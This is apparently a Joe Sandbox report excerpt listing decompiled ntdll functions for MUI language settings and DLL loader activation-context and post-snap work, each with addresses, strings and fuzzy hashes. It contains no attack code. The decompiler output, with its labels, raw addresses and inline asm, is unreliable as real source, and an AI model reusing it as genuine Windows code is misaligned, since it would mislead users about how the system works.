					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E1ED11B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E1ED11B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E1ED11B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E1ED11B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E1ED11B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L1ED24620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E1ED4F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E1ED51370(_t276, 0x1ece4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E1ED4BB40(0,  &_v68, _t170);
									if(L1ED143C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E1ED4BB40(_t257,  &_v68, _t243);
								if(L1ED143C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E1ED51370(_t278, 0x1ece4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L1ED24620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E1ED4F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E1ED51370(_v16, 0x1ece4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E1ED4BB40(_t262,  &_v68, _t244);
								if(L1ED143C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E1ED51370(_t282, 0x1ece4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E1ED4BB40(_t262,  &_v68, _t201);
							if(L1ED143C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L1ED24620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E1ED4F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E1ED51370(_t280, 0x1ece4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E1ED4BB40(_t267,  &_v68, _t245);
							if(L1ED143C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E1ED51370(_t284, 0x1ece4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E1ED4BB40(_t267,  &_v68, _t224);
						if(L1ED143C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                        0x1ed13d3c
                        0x1ed13d42
                        0x1ed13d44
                        0x1ed13d46
                        0x1ed13d49
                        0x1ed13d4c
                        0x1ed13d4f
                        0x1ed13d52
                        0x1ed13d55
                        0x1ed13d58
                        0x1ed13d5b
                        0x1ed13d5f
                        0x1ed13d61
                        0x1ed13d66
                        0x1ed68213
                        0x1ed68218
                        0x1ed14085
                        0x1ed14088
                        0x1ed1408e
                        0x1ed14094
                        0x1ed1409a
                        0x1ed140a0
                        0x1ed140a6
                        0x1ed140a9
                        0x1ed140af
                        0x1ed140b6
                        0x1ed140bd
                        0x1ed140bd
                        0x1ed13d83
                        0x1ed6821f
                        0x1ed68229
                        0x1ed68238
                        0x1ed68238
                        0x1ed6823d
                        0x1ed6823d
                        0x1ed13da0
                        0x1ed13daf
                        0x1ed13db5
                        0x1ed13dba
                        0x1ed13dba
                        0x1ed13dd4
                        0x1ed13e94
                        0x1ed13eab
                        0x1ed13f6d
                        0x1ed13f84
                        0x1ed1406b
                        0x1ed1406b
                        0x1ed1406e
                        0x1ed1406e
                        0x1ed14070
                        0x1ed14074
                        0x1ed68351
                        0x1ed68351
                        0x1ed1407a
                        0x1ed1407f
                        0x1ed6835d
                        0x1ed68370
                        0x1ed68377
                        0x1ed68379
                        0x1ed6837c
                        0x1ed6837c
                        0x1ed6835d
                        0x00000000
                        0x1ed1407f
                        0x1ed13f8a
                        0x1ed13f8d
                        0x1ed13f90
                        0x1ed13f95
                        0x1ed6830d
                        0x1ed6830f
                        0x1ed13f9b
                        0x1ed13fac
                        0x1ed13fae
                        0x1ed13fb1
                        0x1ed13fb1
                        0x1ed13fb6
                        0x1ed68317
                        0x1ed6831a
                        0x00000000
                        0x1ed13fbc
                        0x1ed13fc1
                        0x1ed13fc9
                        0x1ed13fd7
                        0x1ed13fda
                        0x1ed13fdd
                        0x1ed14021
                        0x1ed14021
                        0x1ed14029
                        0x1ed14030
                        0x1ed14044
                        0x1ed14046
                        0x1ed14046
                        0x1ed14044
                        0x1ed14049
                        0x1ed68327
                        0x1ed68334
                        0x1ed68339
                        0x1ed6833c
                        0x1ed1404f
                        0x1ed1404f
                        0x1ed1404f
                        0x1ed14051
                        0x1ed14056
                        0x1ed14063
                        0x1ed14063
                        0x1ed14068
                        0x00000000
                        0x1ed14068
                        0x1ed13fdf
                        0x1ed13fe2
                        0x1ed13fe4
                        0x1ed13fe7
                        0x1ed13fef
                        0x1ed14003
                        0x1ed14005
                        0x1ed14005
                        0x1ed1400c
                        0x1ed14013
                        0x1ed14016
                        0x1ed14017
                        0x1ed1401b
                        0x1ed1401e
                        0x00000000
                        0x1ed1401e
                        0x1ed13fb6
                        0x1ed13eb1
                        0x1ed13eb4
                        0x1ed13eb7
                        0x1ed13ebc
                        0x1ed682a9
                        0x1ed682ab
                        0x1ed13ec2
                        0x1ed13ed3
                        0x1ed13ed5
                        0x1ed13ed8
                        0x1ed13ed8
                        0x1ed13edd
                        0x1ed682b3
                        0x1ed682b6
                        0x00000000
                        0x1ed13ee3
                        0x1ed13ee8
                        0x1ed13eed
                        0x1ed13ef0
                        0x1ed13ef3
                        0x1ed13f02
                        0x1ed13f05
                        0x1ed13f08
                        0x1ed682c0
                        0x1ed682c3
                        0x1ed682c5
                        0x1ed682c8
                        0x1ed682d0
                        0x1ed682e4
                        0x1ed682e6
                        0x1ed682e6
                        0x1ed682ed
                        0x1ed682f4
                        0x1ed682f7
                        0x1ed682f8
                        0x1ed682fc
                        0x1ed682ff
                        0x1ed682ff
                        0x1ed13f0e
                        0x1ed13f11
                        0x1ed13f16
                        0x1ed13f1d
                        0x1ed13f31
                        0x1ed68307
                        0x1ed68307
                        0x1ed13f31
                        0x1ed13f39
                        0x1ed13f48
                        0x1ed13f4d
                        0x1ed13f50
                        0x1ed13f50
                        0x1ed13f53
                        0x1ed13f58
                        0x1ed13f65
                        0x1ed13f65
                        0x1ed13f6a
                        0x00000000
                        0x1ed13f6a
                        0x1ed13edd
                        0x1ed13dda
                        0x1ed13ddd
                        0x1ed13de0
                        0x1ed13de5
                        0x1ed68245
                        0x1ed13deb
                        0x1ed13df7
                        0x1ed13dfc
                        0x1ed13dfe
                        0x1ed13e01
                        0x1ed13e01
                        0x1ed13e06
                        0x1ed6824d
                        0x1ed6824f
                        0x1ed68254
                        0x00000000
                        0x1ed13e0c
                        0x1ed13e11
                        0x1ed13e16
                        0x1ed13e19
                        0x1ed13e29
                        0x1ed13e2c
                        0x1ed13e2f
                        0x1ed6825c
                        0x1ed6825f
                        0x1ed68261
                        0x1ed68264
                        0x1ed6826c
                        0x1ed68280
                        0x1ed68282
                        0x1ed68282
                        0x1ed68289
                        0x1ed68290
                        0x1ed68293
                        0x1ed68294
                        0x1ed68298
                        0x1ed6829b
                        0x1ed6829b
                        0x1ed13e35
                        0x1ed13e38
                        0x1ed13e3d
                        0x1ed13e44
                        0x1ed13e58
                        0x1ed682a3
                        0x1ed682a3
                        0x1ed13e58
                        0x1ed13e60
                        0x1ed13e6f
                        0x1ed13e74
                        0x1ed13e77
                        0x1ed13e77
                        0x1ed13e7a
                        0x1ed13e7f
                        0x1ed13e8c
                        0x1ed13e8c
                        0x1ed13e91
                        0x00000000
                        0x1ed13e91

                        Strings
                        • WindowsExcludedProcs, xrefs: 1ED13D6F
                        • Kernel-MUI-Language-SKU, xrefs: 1ED13F70
                        • Kernel-MUI-Language-Allowed, xrefs: 1ED13DC0
                        • Kernel-MUI-Number-Allowed, xrefs: 1ED13D8C
                        • Kernel-MUI-Language-Disallowed, xrefs: 1ED13E97
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                        • API String ID: 0-258546922
                        • Opcode ID: 5798357c6f38fc758a6d26c48c63486049dd1244c00f1aa0e55d17f066315976
                        • Instruction ID: a8491b304175158370b8a9262c790423a7e1f204fb27c2a0438528ad14f43e76
                        • Opcode Fuzzy Hash: 5798357c6f38fc758a6d26c48c63486049dd1244c00f1aa0e55d17f066315976
                        • Instruction Fuzzy Hash: 44F151B6D00659EFCB11CF99D940ADEFBB9FF08650F11066AE505EB650D730AE01CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED38E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                        Download Yara Rule
                        C-Code - Quality: 44%
                        			E1ED38E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1edfd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1edf8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1edf5780 & 0x00000003) != 0) {
							E1ED85510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1edf5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1ED4B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1edf7984; // 0x2fb2cf0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1edf8464; // 0x74790110
					 *0x1edfb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1ED39B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1edf5780 & 0x00000005) != 0) {
						_push(_t49);
						E1ED85510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                        0x1ed38e0f
                        0x1ed38e16
                        0x1ed38e19
                        0x1ed38e1b
                        0x1ed38e21
                        0x1ed38e7f
                        0x1ed38e85
                        0x1ed79354
                        0x1ed7936c
                        0x1ed79371
                        0x1ed7937b
                        0x1ed79381
                        0x1ed79381
                        0x1ed7937b
                        0x1ed38e9d
                        0x1ed38e9d
                        0x1ed38e29
                        0x1ed38e2c
                        0x1ed38e38
                        0x1ed38e3e
                        0x1ed38e43
                        0x1ed38eb5
                        0x1ed38eb9
                        0x1ed792aa
                        0x1ed792af
                        0x1ed792e8
                        0x1ed792e8
                        0x1ed792af
                        0x1ed38eb9
                        0x1ed38e45
                        0x1ed38e53
                        0x1ed38e5b
                        0x1ed38e5f
                        0x1ed38e78
                        0x1ed38e78
                        0x1ed38e7d
                        0x1ed38ec3
                        0x1ed38ecd
                        0x1ed38ed2
                        0x1ed38ed2
                        0x1ed38ec5
                        0x1ed38ec5
                        0x00000000
                        0x1ed38e7d
                        0x1ed38e67
                        0x1ed38ea4
                        0x1ed7931a
                        0x00000000
                        0x00000000
                        0x1ed79320
                        0x1ed38ea4
                        0x1ed38e70
                        0x1ed79325
                        0x1ed79340
                        0x1ed79345
                        0x1ed79345
                        0x1ed38e76
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        • minkernel\ntdll\ldrsnap.c, xrefs: 1ED7933B, 1ED79367
                        • LdrpFindDllActivationContext, xrefs: 1ED79331, 1ED7935D
                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1ED7932A
                        • Querying the active activation context failed with status 0x%08lx, xrefs: 1ED79357
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-3779518884
                        • Opcode ID: e263c49e11c7941ed6e432008cf74f83a04596044c3a9b22e85c18e6e7a35f3c
                        • Instruction ID: e71a11e5740aaf1cf53f17bba14c353af81305971c6fa43e51d8e33bb5e0c198
                        • Opcode Fuzzy Hash: e263c49e11c7941ed6e432008cf74f83a04596044c3a9b22e85c18e6e7a35f3c
                        • Instruction Fuzzy Hash: BB415DBAD003519FDB109B148C9AB6DF7B2BB00246F26437BE816775D0EB72EC808381
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED18794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                        Download Yara Rule
                        C-Code - Quality: 83%
                        			E1ED18794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E1ED1934A() != 0) {
								_t159 = E1ED8A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1edf5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E1ED85510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1edf5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E1ED1849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E1ED18999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E1ED18999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1edf5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1edf5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E1ED22280(_t92, 0x1edf86cc);
															_t94 = E1EDD9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E1ED361A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1edf5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E1ED18A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1edf5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1edf5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E1ED4F380(_t136, 0x1ece1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E1ED22280(_t108, 0x1edf86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E1ED361A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E1EDD9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E1ED1FFB0(_t118, _t156, 0x1edf86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E1ED49A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                        0x1ed18799
                        0x1ed1879d
                        0x1ed187a1
                        0x1ed187a3
                        0x1ed187a8
                        0x1ed187c3
                        0x1ed187c3
                        0x1ed187c8
                        0x1ed187d1
                        0x1ed187d4
                        0x1ed187d8
                        0x1ed187e5
                        0x1ed187ec
                        0x1ed69bfe
                        0x1ed69c00
                        0x1ed69c02
                        0x1ed69c08
                        0x1ed69c0d
                        0x1ed69c0f
                        0x1ed69c14
                        0x1ed69c2d
                        0x1ed69c32
                        0x1ed69c37
                        0x1ed69c3a
                        0x1ed69c3c
                        0x1ed69c42
                        0x1ed69c42
                        0x1ed69c3c
                        0x1ed69c02
                        0x1ed187da
                        0x1ed187df
                        0x1ed187e3
                        0x00000000
                        0x00000000
                        0x1ed187e3
                        0x1ed187f2
                        0x00000000
                        0x1ed187fb
                        0x1ed187fd
                        0x1ed187fe
                        0x1ed1880e
                        0x1ed1880f
                        0x1ed18810
                        0x1ed18814
                        0x1ed1881a
                        0x1ed1881c
                        0x1ed1881f
                        0x1ed18821
                        0x1ed18822
                        0x1ed18824
                        0x1ed18826
                        0x1ed1882c
                        0x1ed1882e
                        0x1ed69c48
                        0x1ed69c48
                        0x1ed18834
                        0x1ed18834
                        0x1ed18837
                        0x00000000
                        0x00000000
                        0x1ed18837
                        0x1ed1882e
                        0x1ed1883d
                        0x1ed18840
                        0x1ed18843
                        0x1ed18846
                        0x1ed18849
                        0x1ed1884c
                        0x1ed1884e
                        0x1ed18850
                        0x1ed18852
                        0x1ed18854
                        0x1ed18857
                        0x1ed188b4
                        0x1ed188b6
                        0x1ed188b6
                        0x1ed18859
                        0x1ed18859
                        0x1ed18859
                        0x1ed18861
                        0x1ed18866
                        0x1ed1886a
                        0x1ed1893d
                        0x1ed18941
                        0x00000000
                        0x1ed18947
                        0x1ed18947
                        0x1ed1894a
                        0x1ed1894c
                        0x00000000
                        0x1ed18952
                        0x1ed18955
                        0x1ed1895a
                        0x1ed1895d
                        0x1ed1895d
                        0x1ed1895f
                        0x1ed18961
                        0x1ed18961
                        0x1ed18968
                        0x00000000
                        0x00000000
                        0x1ed1896a
                        0x1ed1896b
                        0x1ed1896e
                        0x00000000
                        0x1ed18970
                        0x1ed18970
                        0x1ed18970
                        0x1ed18970
                        0x1ed18972
                        0x1ed18972
                        0x1ed18974
                        0x00000000
                        0x1ed1897a
                        0x1ed1897a
                        0x1ed1897d
                        0x00000000
                        0x1ed18983
                        0x1ed69c65
                        0x1ed69c6d
                        0x1ed69c72
                        0x1ed69c75
                        0x1ed69c75
                        0x1ed69c82
                        0x1ed69c86
                        0x1ed69c87
                        0x1ed69c88
                        0x1ed69c89
                        0x1ed69c8c
                        0x1ed69c90
                        0x1ed69c95
                        0x1ed69c97
                        0x1ed69ca0
                        0x1ed69ca3
                        0x1ed69ca9
                        0x1ed69ca9
                        0x00000000
                        0x1ed69ca9
                        0x1ed69ca3
                        0x00000000
                        0x1ed69c97
                        0x1ed1897d
                        0x00000000
                        0x1ed18974
                        0x1ed18988
                        0x1ed18992
                        0x1ed18996
                        0x00000000
                        0x1ed18996
                        0x1ed1894c
